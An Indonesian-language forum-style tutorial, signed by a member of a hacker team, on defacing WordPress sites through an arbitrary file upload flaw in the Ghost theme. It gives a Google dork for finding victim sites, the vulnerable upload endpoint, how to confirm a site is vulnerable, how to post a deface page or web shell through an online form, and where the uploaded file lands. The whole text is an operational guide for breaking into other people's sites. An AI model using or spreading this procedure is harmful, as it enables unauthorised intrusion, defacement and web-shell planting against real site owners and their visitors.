Tutor Deface WP Ghost Theme AFU

Hay gan,Kali ini saya mau share tutor cara deface dengan teknik Arbitary File Upload yang bug nya terdapat pada salah satu tema wordpress yaitu Theme Ghost.. (Wp Ghost Theme).Tanpa Basa basi Lagi Langsung Ae Ke Tutorialnya...

Bahan" Defacenya ~>

> Hp/Pc

> Internet

> Dork+Exploitnya

> CSRF Online(Google banyak)

> Kopi Jangan lupa gan

Dork : inurl:/wp-content/themes/Ghost

Xploit : /Ghost/includes/uploadify/upload_settings_image.php

Cara aksesnya : /wp-content/uploads/settingsimages/( File Kalian )

    - STEP BY STEP -

1. Seperti biasa Gan, PertamaTama Dorking dulu Pake Dork diatas..

2. Pilih Target yang menurut Kalian Vuln Gan.

3. Nah kalian coba satu", Maasukin Exploit,..

- Kek Gini ~>

http://target.com/Ghost/includes/uploadify/upload_settings_image.php

Kalo vuln ada tulisan [ {"status":"NOK", "ERR":"This file is incorect"} ]

4. kalo vuln kalian masuk CSFR Online( Cari di google bnyk :v )

5. Lalu kalian paste URL Target dan Post File nya kalian tulis Filedata

6. Kaalo sudah tinggal gasken upload script deface kalian atau upload shell kalian ( kalo hoki :d )

- Cara akses filenya?~>

http://target.com/wp-content/uploads/settingsimages/( File Kalian )

- Oke Sekian tutor dari gw dan selamat mencoba..See U all.. - 

  It's Me Z1BeeGans

- Manusia Tersakiti Team -